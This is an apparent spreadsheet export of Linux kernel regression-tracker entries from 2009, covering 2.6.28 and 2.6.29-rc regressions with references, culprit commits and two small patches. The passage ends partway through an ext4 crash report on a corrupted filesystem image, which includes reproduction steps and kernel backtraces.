    <t>2009-01-09 15:16 UTC</t>
  </si>
  <si>
    <t>2009-03-07 14:16 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc9: oprofile regression Submitter : Tim Blechmann &lt;tim@klingt.org&gt; Date : 2008-12-21 14:23 References : http://marc.info/?l=linux-kernel&amp;m=122986946614791&amp;w=4 Handled-By : Andi Kleen &lt;ak@linux.intel.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hwinfo problem since 2.6.28</t>
  </si>
  <si>
    <t>2009-01-09 15:25 UTC</t>
  </si>
  <si>
    <t>2009-02-04 17:31 UTC</t>
  </si>
  <si>
    <t>Subject : hwinfo problem since 2.6.28 Submitter : "Beschorner Daniel" &lt;Daniel.Beschorner@facton.com&gt; Date : 2009-01-06 8:53 References : http://marc.info/?l=linux-kernel&amp;m=123123277800835&amp;w=4 Handled-By : Suresh Siddha &lt;suresh.b.siddha@intel.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123154005127497&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>function stir421x_patch_device can't upload firmware</t>
  </si>
  <si>
    <t>2009-01-10 01:16 UTC</t>
  </si>
  <si>
    <t>Jose-Vicente Gilabert</t>
  </si>
  <si>
    <t>2009-01-25 14:01 UTC</t>
  </si>
  <si>
    <t>The problem is a variable defined as char[11] to keep the name of the firmware file which is always 11 chars long. It should be a char[12] to fit the trailing "\0". Patch: --- irda-usb.c.wrong 2009-01-10 09:50:49.000000000 +0100 +++ irda-usb.c.ok 2009-01-10 09:50:12.000000000 +0100 @@ -1075,7 +1075,7 @@ { unsigned int i; int ret; - char stir421x_fw_name[11]; + char stir421x_fw_name[12]; const struct firmware *fw; const unsigned char *fw_version_ptr; /* pointer to version string */ unsigned long fw_version = 0; The assignment to stir421x_fw_name is made one line later: /* * Known firmware patch file names for STIR421x dongles * are "42101001.sb" or "42101002.sb" */ sprintf(stir421x_fw_name, "4210%4X.sb", self-&gt;usbdev-&gt;descriptor.bcdDevice); ret = request_firmware(&amp;fw, stir421x_fw_name, &amp;self-&gt;usbdev-&gt;dev); This function has been working through several versions of the kernel but it started to fail after my last ubuntu upgrade. ???</t>
  </si>
  <si>
    <t>USB wakeup problem on multiple machines</t>
  </si>
  <si>
    <t>commit 6fd9086a518d4f14213a32fe6c9ac17fabebbc1e</t>
  </si>
  <si>
    <t>2009-01-10 13:30 UTC</t>
  </si>
  <si>
    <t>2009-02-04 04:37 UTC</t>
  </si>
  <si>
    <t>Subject : [Regression] USB wakeup problem on Toshiba Portege R500 Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2009-01-08 7:35 References : http://marc.info/?l=linux-kernel&amp;m=123140019117968&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline. Caused by: commit 6fd9086a518d4f14213a32fe6c9ac17fabebbc1e Author: Alan Stern &lt;stern@rowland.harvard.edu&gt; Date: Wed Dec 17 17:20:38 2008 -0500 USB: automatically enable wakeup for PCI host controllers Signed-off-by: Alan Stern &lt;stern@rowland.harvard.edu&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; First-Bad-Commit : 6fd9086a518d4f14213a32fe6c9ac17fabebbc1e</t>
  </si>
  <si>
    <t>git-latest: kernel oops in IOMMU setup</t>
  </si>
  <si>
    <t>2.6.28-git</t>
  </si>
  <si>
    <t>2009-01-10 13:40 UTC</t>
  </si>
  <si>
    <t>2009-02-08 13:22 UTC</t>
  </si>
  <si>
    <t>Subject : git-latest: kernel oops in IOMMU setup Submitter : Dirk Hohndel &lt;hohndel@infradead.org&gt; Date : 2009-01-08 20:05 References : http://marc.info/?l=linux-kernel&amp;m=123144520124853&amp;w=4 Handled-By : Dirk Hohndel &lt;hohndel@infradead.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123152033725557&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.29-rc: kernel BUG at fs/xfs/support/debug.c:108</t>
  </si>
  <si>
    <t>2.6.29-rc</t>
  </si>
  <si>
    <t>2009-01-10 13:58 UTC</t>
  </si>
  <si>
    <t>2009-02-03 14:55 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc: kernel BUG at fs/xfs/support/debug.c:108 Submitter : Alexander Beregalov &lt;a.beregalov@gmail.com&gt; Date : kernel-testers@vger.kernel.org References : http://thread.gmane.org/gmane.comp.file-systems.xfs.general/27548 Handled-By : Christoph Hellwig &lt;hch@infradead.org&gt; Notify-Also : Eric Sandeen &lt;sandeen@sandeen.net&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>oops in __bounce_end_io_read under kvm</t>
  </si>
  <si>
    <t>2.6.28-rc9-xfs</t>
  </si>
  <si>
    <t>2009-01-10 15:09 UTC</t>
  </si>
  <si>
    <t>2009-06-13 10:39 UTC</t>
  </si>
  <si>
    <t>Subject : oops in __bounce_end_io_read under kvm Submitter : Christoph Hellwig &lt;hch@lst.de&gt; Date : 2008-12-26 17:36 References : http://marc.info/?l=linux-kernel&amp;m=123031303400676&amp;w=4 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28 thinks that my PS/2 mouse is a touchpad</t>
  </si>
  <si>
    <t>2009-01-10 15:16 UTC</t>
  </si>
  <si>
    <t>2009-03-14 14:31 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28 thinks that my PS/2 mouse is a touchpad Submitter : "Alexander E. Patrakov" &lt;patrakov@gmail.com&gt; Date : 2008-12-27 9:06 References : http://marc.info/?l=linux-kernel&amp;m=123036893817280&amp;w=4 Handled-By : Arjan Opmeer &lt;arjan@opmeer.net&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123092147703236&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel 2.6.28 regression: Hang after hibernate</t>
  </si>
  <si>
    <t>2009-01-10 15:22 UTC</t>
  </si>
  <si>
    <t>2010-03-01 17:21 UTC</t>
  </si>
  <si>
    <t>Subject : Kernel 2.6.28 regression: Hang after hibernate Submitter : "Frank Groeneveld" &lt;frankgroeneveld@gmail.com&gt; Date : 2008-12-28 20:34 References : http://marc.info/?l=linux-kernel&amp;m=123049651906081&amp;w=4 Notify-Also : Pavel Machek &lt;pavel@suse.cz&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>resource map sanity check conflict: 0x7fffff00 0x800000ff 0x7ffff000 0x7fffffff ACPI Non-volatile Storage</t>
  </si>
  <si>
    <t>2009-01-10 15:46 UTC</t>
  </si>
  <si>
    <t>2009-01-12 04:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28 regression: ACPI Non-volatile Storage Submitter : Martin MOKREJŠ &lt;mmokrejs@ribosome.natur.cuni.cz&gt; Date : 2008-12-30 14:56 References : http://marc.info/?l=linux-kernel&amp;m=123064945018849&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression in v2.6.28 introduced by: 'USB: skip Set-Interface(0) if already in altsetting 0'</t>
  </si>
  <si>
    <t>2009-01-10 16:14 UTC</t>
  </si>
  <si>
    <t>2009-01-12 14:50 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] Regression in v2.6.28 introduced by: 'USB: skip Set-Interface(0) if already in altsetting 0' Submitter : Jan Scholz &lt;scholz@fias.uni-frankfurt.de&gt; Date : 2009-01-02 11:04 References : http://marc.info/?l=linux-kernel&amp;m=123089613601599&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline. Introduced by: commit 24c0996a6b73e2554104961afcc8659534503e0d Author: Alan Stern &lt;stern@rowland.harvard.edu&gt; Date: Mon Dec 1 10:24:41 2008 -0500 USB: skip Set-Interface(0) if already in altsetting 0 Signed-off-by: Alan Stern &lt;stern@rowland.harvard.edu&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; First-Bad-Commit : 24c0996a6b73e2554104961afcc8659534503e0d</t>
  </si>
  <si>
    <t>WARNING: at drivers/net/wireless/iwlwifi/iwl-sta.c:689</t>
  </si>
  <si>
    <t>2009-01-10 16:35 UTC</t>
  </si>
  <si>
    <t>2009-02-10 10:58 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-git: WARNING: at drivers/net/wireless/iwlwifi/iwl-sta.c:689 Submitter : Christian Borntraeger &lt;borntraeger@de.ibm.com&gt; Date : 2009-01-05 10:36 References : http://marc.info/?l=linux-wireless&amp;m=123115178019082&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Recent change to kernel spikes out ccache/distcc</t>
  </si>
  <si>
    <t>commit ad7a953c</t>
  </si>
  <si>
    <t>2009-01-10 16:40 UTC</t>
  </si>
  <si>
    <t>2009-02-04 17:56 UTC</t>
  </si>
  <si>
    <t>Subject : Recent change to kernel spikes out ccache/distcc Submitter : "Theodore Ts'o" &lt;tytso@mit.edu&gt; Date : 2009-01-06 15:15 References : http://marc.info/?l=linux-kernel&amp;m=123125495000603&amp;w=4 Notify-Also : "Jan Beulich" &lt;jbeulich@novell.com&gt; Notify-Also : Sam Ravnborg &lt;sam@ravnborg.org&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>glx performance drop with: "x86: PAT: implement track/untrack of pfnmap regions for x86 - v3"</t>
  </si>
  <si>
    <t>commit 5899329b19100c0b82dc78e9b21ed8b920c9ffb3</t>
  </si>
  <si>
    <t>2009-01-10 16:47 UTC</t>
  </si>
  <si>
    <t>2009-02-04 16:55 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] glx performance drop with: "x86: PAT: implement track/untrack of pfnmap regions for x86 - v3" Submitter : Alexey Fisher &lt;bug-track@fisher-privat.net&gt; Date : 2009-01-06 18:46 References : http://marc.info/?l=linux-kernel&amp;m=123126782822696&amp;w=4 Handled-By : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Introduced by: commit 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 Author: venkatesh.pallipadi@intel.com &lt;venkatesh.pallipadi@intel.com&gt; Date: Thu Dec 18 11:41:30 2008 -0800 x86: PAT: implement track/untrack of pfnmap regions for x86 - v3 Signed-off-by: Venkatesh Pallipadi &lt;venkatesh.pallipadi@intel.com&gt; Signed-off-by: Suresh Siddha &lt;suresh.b.siddha@intel.com&gt; Signed-off-by: H. Peter Anvin &lt;hpa@zytor.com&gt;</t>
  </si>
  <si>
    <t>Repeated ioctl(4, 0x40046445, ..) loop in glxgears</t>
  </si>
  <si>
    <t>commit 7c1c2871a6a3a114853ec6836e9035ac1c0c7f7a</t>
  </si>
  <si>
    <t>2009-01-10 16:52 UTC</t>
  </si>
  <si>
    <t>2009-03-16 14:28 UTC</t>
  </si>
  <si>
    <t>Subject : Re: [regression] glx performance drop with: "x86: PAT: implement track/untrack of pfnmap regions for x86 - v3" Submitter : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt; Date : 2009-01-07 22:43 References : http://marc.info/?l=linux-kernel&amp;m=123136836213319&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Introduced by: commit 7c1c2871a6a3a114853ec6836e9035ac1c0c7f7a Author: Dave Airlie &lt;airlied@redhat.com&gt; Date: Fri Nov 28 14:22:24 2008 +1000 drm: move to kref per-master structures. Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; First-Bad-Commit : 7c1c2871a6a3a114853ec6836e9035ac1c0c7f7a</t>
  </si>
  <si>
    <t>possible circular locking dependency on i915 dma</t>
  </si>
  <si>
    <t>2009-01-10 17:02 UTC</t>
  </si>
  <si>
    <t>2009-03-31 02:10 UTC</t>
  </si>
  <si>
    <t>Subject : possible circular locking dependency on i915 dma Submitter : Wang Chen &lt;wangchen@cn.fujitsu.com&gt; Date : 2009-01-08 14:11 References : http://marc.info/?l=linux-kernel&amp;m=123142399720125&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at drivers/ata/libata-sff.c:1017 ata_sff_hsm_move+0x45e/0x750()</t>
  </si>
  <si>
    <t>2.6.28-self-07939-g2150edc</t>
  </si>
  <si>
    <t>2009-01-10 17:09 UTC</t>
  </si>
  <si>
    <t>2009-01-14 02:58 UTC</t>
  </si>
  <si>
    <t>Subject : todays git: WARNING: at drivers/ata/libata-sff.c:1017 ata_sff_hsm_move+0x45e/0x750() Submitter : Christian Borntraeger &lt;borntraeger@de.ibm.com&gt; Date : 2009-01-09 12:34 References : http://marc.info/?l=linux-kernel&amp;m=123150457832109&amp;w=4 Notify-Also : Sergei Shtylyov &lt;sshtylyov@ru.mvista.com&gt; Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Introduced by: commit 871af1210f13966ab911ed2166e4ab2ce775b99d Author: Alan Cox &lt;alan@redhat.com&gt; Date: Mon Jan 5 14:16:39 2009 +0000 libata: Add 32bit PIO support Signed-off-by: Alan Cox &lt;alan@redhat.com&gt; Signed-off-by: Jeff Garzik &lt;jgarzik@redhat.com&gt; First-Bad-Commit : 871af1210f13966ab911ed2166e4ab2ce775b99d</t>
  </si>
  <si>
    <t>GPF on 2.6.28 and 2.6.28-rc9-git3, e1000e and e1000 issues</t>
  </si>
  <si>
    <t>2009-01-10 17:15 UTC</t>
  </si>
  <si>
    <t>2010-09-03 09:09 UTC</t>
  </si>
  <si>
    <t>Subject : GPF on 2.6.28 &amp; 2.6.28-rc9-git3 e1000e / e1000 issues Submitter : "Doug Bazarnic" &lt;doug@bazarnic.net&gt; Date : 2009-01-09 21:26 References : http://marc.info/?l=linux-kernel&amp;m=123153653120204&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-git can't resume from str</t>
  </si>
  <si>
    <t>2009-01-10 17:19 UTC</t>
  </si>
  <si>
    <t>2009-02-03 15:02 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-git can't resume from str Submitter : "Jeff Chua" &lt;jeff.chua.linux@gmail.com&gt; Date : 2009-01-10 1:39 References : http://marc.info/?l=linux-kernel&amp;m=123155157909282&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Reportedly introduced by: commit e3f47f89a57ef115755184a8b3f03a47ee227418 Author: Daniel Drake &lt;dsd@gentoo.org&gt; Date: Wed Dec 10 23:28:25 2008 +0200 USB: unusual_devs.h additions for Pentax K10D Signed-off-by: Daniel Drake &lt;dsd@gentoo.org&gt; Signed-off-by: Phil Dibowitz &lt;phil@ipom.com&gt;</t>
  </si>
  <si>
    <t>Quirk for AD1884A sub-type "laptop" for HP 6730b laptop</t>
  </si>
  <si>
    <t>2009-01-10 19:46 UTC</t>
  </si>
  <si>
    <t>2009-01-11 04:16 UTC</t>
  </si>
  <si>
    <t>Needs a quirk: ) Needs a quirk to put the AD1984A codec in "laptop" mode. (NB: The AD1984A codec inherits from the base settings in AD1884A) index 686c774..3175b98 100644 --- a/sound/pci/hda/patch_analog.c +++ b/sound/pci/hda/patch_analog.c @@ -3863,6 +3863,7 @@ static struct snd_pci_quirk ad1884a_cfg_tbl[] = { SND_PCI_QUIRK(0x103c, 0x3056, "HP", AD1884A_MOBILE), SND_PCI_QUIRK(0x103c, 0x30e7, "HP EliteBook 8530p", AD1884A_LAPTOP), SND_PCI_QUIRK(0x103c, 0x3614, "HP 6730s", AD1884A_LAPTOP), + SND_PCI_QUIRK(0x103c, 0x30e6, "HP 6730b", AD1884A_LAPTOP), SND_PCI_QUIRK(0x17aa, 0x20ac, "Thinkpad X300", AD1884A_THINKPAD), {} };</t>
  </si>
  <si>
    <t>TMDC Joystick no longer works in kernel 2.6.28</t>
  </si>
  <si>
    <t>2009-01-11 04:58 UTC</t>
  </si>
  <si>
    <t>2009-04-19 10:14 UTC</t>
  </si>
  <si>
    <t>Subject : TMDC Joystick no longer works in kernel 2.6.28 Submitter : "Andrew S. Johnson" &lt;andy@asjohnson.com&gt; Date : 2009-01-10 21:53 References : http://marc.info/?l=linux-kernel&amp;m=123162486415366&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>cpumask change causes sparc build bustage</t>
  </si>
  <si>
    <t>commit 588235bb53f2c215f0d4b08fd30b461fedc3338e</t>
  </si>
  <si>
    <t>2009-01-11 05:03 UTC</t>
  </si>
  <si>
    <t>2009-02-08 13:20 UTC</t>
  </si>
  <si>
    <t>Subject : cpumask change causes sparc build bustage Submitter : David Miller &lt;davem@davemloft.net&gt; Date : 2009-01-11 8:31 References : http://marc.info/?l=linux-kernel&amp;m=123166268013838&amp;w=4 Handled-By : David Miller &lt;davem@davemloft.net&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123167571525706&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Introduced by: commit 588235bb53f2c215f0d4b08fd30b461fedc3338e Author: Mike Travis &lt;travis@sgi.com&gt; Date: Sun Jan 4 05:18:02 2009 -0800 cpumask: update pci_bus_show_cpuaffinity to use new cpumask API Signed-off-by: Mike Travis &lt;travis@sgi.com&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : 588235bb53f2c215f0d4b08fd30b461fedc3338e</t>
  </si>
  <si>
    <t>Build error on latest git</t>
  </si>
  <si>
    <t>2.6.29-rc1</t>
  </si>
  <si>
    <t>2009-01-11 05:07 UTC</t>
  </si>
  <si>
    <t>2009-01-13 03:22 UTC</t>
  </si>
  <si>
    <t>Subject : Build error on latest git Submitter : Petr Titera &lt;P.Titera@century.cz&gt; Date : 2009-01-11 9:49 References : http://marc.info/?l=linux-kernel&amp;m=123166856318712&amp;w=4 Handled-By : Petr Titera &lt;P.Titera@century.cz&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123167509024996&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>different oops &amp; panic on accessing an intentionally corrupted ext4 fs image</t>
  </si>
  <si>
    <t>2009-01-11 08:24 UTC</t>
  </si>
  <si>
    <t>2009-02-03 11:19 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: qemu x86 Software Environment: Minimal Debian sid/unstable Problem Description: On accessing an intentionally corrupted ext4 filesystem, I got a BUG once and a panic in interrupt in another run on the same filesystem image. Steps to reproduce: 1. gunzip the attached filesystem image 2. mount hdb.30000241 /mnt -t ext4 -o loop,errors=continue 3. cd /mnt 4. find -xdev -print0 2&gt;/dev/null |xargs -0 touch -- 2&gt;/dev/null Here are the two quite different backtraces I got: ------------------------------------------------------------ EXT4-fs error (device hdb): ext4_dx_find_entry: bad entry in directory #772: inode out of bounds - offset=10988, inode=2993, rec_len=44, name_len=36 EXT4-fs error (device hdb): ext4_add_entry: bad entry in directory #772: inode out of bounds - offset=748, inode=2993, rec_len=44, name_len=36 EXT4-fs error (device hdb): ext4_dx_find_entry: bad entry in directory #772: inode out of bounds - offset=14452, inode=525135, rec_len=48, name_len=40 EXT4-fs error (device hdb): ext4_add_entry: bad entry in directory #772: inode out of bounds - offset=116, inode=525135, rec_len=48, name_len=40 EXT4-fs error (device hdb): ext4_dx_find_entry: bad entry in directory #772: rec_len is too small for name_len - offset=13312, inode=783, rec_len=96, name_len=92 EXT4-fs error (device hdb): ext4_add_entry: bad entry in directory #772: rec_len is too small for name_len - offset=0, inode=783, rec_len=96, name_len=92 attempt to access beyond end of device hdb: rw=0, want=3670337260, limit=20480 attempt to access beyond end of device hdb: rw=0, want=3670337260, limit=20480 attempt to access beyond end of device hdb: rw=0, want=3670337260, limit=20480 BUG: unable to handle kernel paging request at c721a000 IP: [&lt;c030da11&gt;] ext4_add_entry+0x40c/0x868 *pde = 00017067 *pte = 0721a160 Oops: 0002 [#1] SMP DEBUG_PAGEALLOC last sysfs file: Pid: 702, comm: touch Not tainted (2.6.28 #1) EIP: 0060:[&lt;c030da11&gt;] EFLAGS: 00000202 CPU: 0 EIP is at ext4_add_entry+0x40c/0x868 EAX: ffff9e91 EBX: c71a6c00 ECX: 3ffe1aa4 EDX: c73ae000 ESI: c742796f EDI: c721a000 EBP: c5c68e68 ESP: c5c68db0 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process touch (pid: 702, ti=c5c68000 task=c7a44d80 task.ti=c5c68000) Stack: c5c68e4c c74ca700 00000000 00000000 c5c68e4c c7611d9c c75f85f0 c7444000 c750880c c7a52800 00000000 00000400 c7508730 00000128 c5c68e3c 00000000 c7a44d80 c5ed9740 c7a44d80 000081a4 c750880c 00000400 c75769a0 c750880c Call Trace: [&lt;c032d628&gt;] ? jbd2_journal_start+0xdf/0x115 [&lt;c030e681&gt;] ? ext4_add_nondir+0x15/0x4d [&lt;c030ed44&gt;] ? ext4_create+0xde/0xf1 [&lt;c030ec66&gt;] ? ext4_create+0x0/0xf1 [&lt;c027b22a&gt;] ? vfs_create+0x78/0xb8 [&lt;c027ded4&gt;] ? do_filp_open+0x6fb/0x7ca [&lt;c0563481&gt;] ? _spin_unlock+0x1d/0x20 [&lt;c0285b2e&gt;] ? alloc_fd+0x84/0xfa [&lt;c027202c&gt;] ? do_sys_open+0x4b/0xd4 [&lt;c0272101&gt;] ? sys_open+0x23/0x2b [&lt;c020309e&gt;] ? syscall_call+0x7/0xb Code: c0 0c 89 45 a8 8b 55 ac 0f b7 72 10 81 fe ff ff 00 00 b8 00 00 01 00 0f 44 f0 03 75 a8 89 d0 03 45 9c 29 f0 89 c1 c1 e9 02 89 df &lt;f3&gt; a5 89 c1 83 e1 03 74 02 f3 a4 89 da 8d 0c 03 be 00 00 01 00 EIP: [&lt;c030da11&gt;] ext4_add_entry+0x40c/0x868 SS:ESP 0068:c5c68db0 ---[ end trace 442c731a60691f13 ]--- xargs[701]: segfault at 65677275 ip b7f0e16f sp bfa1fd60 error 4 in ld-2.7.so[b7f05000+1a000] ------------------------------------------------------------ And the other: ------------------------------------------------------------ EXT4-fs error (device hdb): ext4_dx_find_entry: bad entry in directory #772: rec_len is too small for name_len - offset=13312, inode=783, rec_len=96, name_len=92 EXT4-fs error (device hdb): ext4_add_entry: bad entry in directory #772: rec_len is too small for name_len - offset=0, inode=783, rec_len=96, name_len=92 attempt to access beyond end of device hdb: rw=0, want=3670337260, limit=20480 attempt to access beyond end of device hdb: rw=0, want=3670337260, limit=20480 attempt to access beyond end of device hdb: rw=0, want=3670337260, limit=20480 BUG: unable to handle kernel NULL pointer dereference at 000000c4 IP: [&lt;c021faf5&gt;] account_system_time+0x8c/0x147 *pde = 00000000 Oops: 0000 [#1] SMP DEBUG_PAGEALLOC last sysfs file: Pid: 0, comm: Not tainted (2.6.28 #1) EIP: 0060:[&lt;c021faf5&gt;] EFLAGS: 00000046 CPU: 0 EIP is at account_system_time+0x8c/0x147 EAX: 00000000 EBX: c06cb020 ECX: 00000001 EDX: c06cef00 ESI: 00000000 EDI: c78cc3d0 EBP: c7a92d10 ESP: c7a92cf0 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process (pid: 0, ti=c7a92000 task=c78cc3d0 task.ti=00000000) Stack: 00010000 00adb000 c06cef00 ffffffff 00000001 c78cc3d0 00000000 c78cc3d0 c7a92d1c c022b8fa 00000000 c7a92d30 c022b941 c11a55a0 00000000 c11a55a0 c7a92d38 c023e790 c7a92d58 c023e7f0 c7a92000 c11a55a0 00000000 c11a55a0 Call Trace: [&lt;c022b8fa&gt;] ? account_process_tick+0x19/0x41 [&lt;c022b941&gt;] ? update_process_times+0x1f/0x4e [&lt;c023e790&gt;] ? tick_periodic+0x25/0x6c [&lt;c023e7f0&gt;] ? tick_handle_periodic+0x19/0x79 [&lt;c020db09&gt;] ? smp_apic_timer_interrupt+0x57/0x88 [&lt;c0203cb4&gt;] ? apic_timer_interrupt+0x28/0x30 [&lt;c030da11&gt;] ? ext4_add_entry+0x40c/0x868 [&lt;c032d628&gt;] ? jbd2_journal_start+0xdf/0x115 [&lt;c030e681&gt;] ? ext4_add_nondir+0x15/0x4d [&lt;c030ed44&gt;] ? ext4_create+0xde/0xf1 [&lt;c030ec66&gt;] ? ext4_create+0x0/0xf1 [&lt;c027b22a&gt;] ? vfs_create+0x78/0xb8 [&lt;c027ded4&gt;] ? do_filp_open+0x6fb/0x7ca [&lt;c0563481&gt;] ? _spin_unlock+0x1d/0x20 [&lt;c0285b2e&gt;] ? alloc_fd+0x84/0xfa [&lt;c027202c&gt;] ? do_sys_open+0x4b/0xd4 [&lt;c0274b13&gt;] ? fput+0x19/0x1f [&lt;c0271f0e&gt;] ? filp_close+0x41/0x5f [&lt;c0272101&gt;] ? sys_open+0x23/0x2b [&lt;c020309e&gt;] ? syscall_call+0x7/0xb Code: ff 8b 48 14 89 c8 25 00 00 ff 0f 3b 45 e0 74 35 01 5a 20 11 72 24 89 f8 e8 d0 e1 02 00 83 c4 14 5b 5e 5f 5d c3 8b 87 ac 03 00 00 &lt;8b&gt; 90 c4 00 00 00 85 d2 74 bc 64 a1 04 a0 6c c0 f7 d2 8b 04 82 EIP: [&lt;c021faf5&gt;] account_system_time+0x8c/0x147 SS:ESP 0068:c7a92cf0 Kernel panic - not syncing: Fatal exception in interrupt ------------[ cut here ]------------ WARNING: at kernel/smp.c:333 smp_call_function_mask+0x1ae/0x1b3() Pid: 0, comm: Tainted: G D 2.6.28 #1 Call Trace: [&lt;c0560abb&gt;] ? printk+0x18/0x1a [&lt;c02231ad&gt;] warn_on_slowpath+0x49/0x6b [&lt;c04775e8&gt;] ? delay_tsc+0x31/0x51 [&lt;c04775e8&gt;] ? delay_tsc+0x31/0x51 [&lt;c0477544&gt;] ? __const_udelay+0x34/0x36 [&lt;c04a28d5&gt;] ? wait_for_xmitr+0x4e/0x9b [&lt;c04775e8&gt;] ? delay_tsc+0x31/0x51 [&lt;c0477544&gt;] ? __const_udelay+0x34/0x36 [&lt;c0563481&gt;] ? _spin_unlock+0x1d/0x20 [&lt;c04a2922&gt;] ? serial8250_console_putchar+0x0/0x22 [&lt;c0246aa8&gt;] smp_call_function_mask+0x1ae/0x1b3 [&lt;c020cdea&gt;] ? stop_this_cpu+0x0/0x36 [&lt;c0205ac5&gt;] ? show_registers+0x79/0x1ef [&lt;c049c6b2&gt;] ? do_unblank_screen+0x1d/0x127 [&lt;c0246ac4&gt;] smp_call_function+0x17/0x19 [&lt;c020cddd&gt;] native_smp_send_stop+0x1b/0x28 [&lt;c05609f1&gt;] panic+0x4b/0xfd [&lt;c020575c&gt;] oops_end+0x6f/0x7b [&lt;c0205e6b&gt;] die+0x4e/0x64 [&lt;c0211b2b&gt;] do_page_fault+0x292/0x797 [&lt;c0320a22&gt;] ? ext4_mb_new_blocks+0x13e/0x729 [&lt;c0319e30&gt;] ? ext4_ext_get_blocks+0x1c9/0xee5 [&lt;c023c8af&gt;] ? clocksource_get_next+0x3d/0x44 [&lt;c0211899&gt;] ? do_page_fault+0x0/0x797 [&lt;c0563a2a&gt;] error_code+0x72/0x78 [&lt;c021faf5&gt;] ? account_system_time+0x8c/0x147 [&lt;c022b8fa&gt;] account_process_tick+0x19/0x41 [&lt;c022b941&gt;] update_process_times+0x1f/0x4e [&lt;c023e790&gt;] tick_periodic+0x25/0x6c [&lt;c023e7f0&gt;] tick_handle_periodic+0x19/0x79 [&lt;c020db09&gt;] smp_apic_timer_interrupt+0x57/0x88 [&lt;c0203cb4&gt;] apic_timer_interrupt+0x28/0x30 [&lt;c030da11&gt;] ? ext4_add_entry+0x40c/0x868 [&lt;c032d628&gt;] ? jbd2_journal_start+0xdf/0x115 [&lt;c030e681&gt;] ext4_add_nondir+0x15/0x4d [&lt;c030ed44&gt;] ext4_create+0xde/0xf1 [&lt;c030ec66&gt;] ? ext4_create+0x0/0xf1 [&lt;c027b22a&gt;] vfs_create+0x78/0xb8 [&lt;c027ded4&gt;] do_filp_open+0x6fb/0x7ca [&lt;c0563481&gt;] ? _spin_unlock+0x1d/0x20 [&lt;c0285b2e&gt;] ? alloc_fd+0x84/0xfa [&lt;c027202c&gt;] do_sys_open+0x4b/0xd4 [&lt;c0274b13&gt;] ? fput+0x19/0x1f [&lt;c0271f0e&gt;] ? filp_close+0x41/0x5f [&lt;c0272101&gt;] sys_open+0x23/0x2b [&lt;c020309e&gt;] syscall_call+0x7/0xb ---[ end trace e7c34c864c51f32f ]--- general protection fault: fffa [#2] SMP DEBUG_PAGEALLOC last sysfs file: Pid: 0, comm: Tainted: G D W (2.6.28 #1) EIP: 0060:[&lt;c0560a17&gt;] EFLAGS: 00000246 CPU: 0 EIP is at panic+0x71/0xfd EAX: 00000000 EBX: 00000000 ECX: c02399db EDX: 00000001 ESI: c7a92cb8 EDI: 0000000b EBP: c7a92b28 ESP: 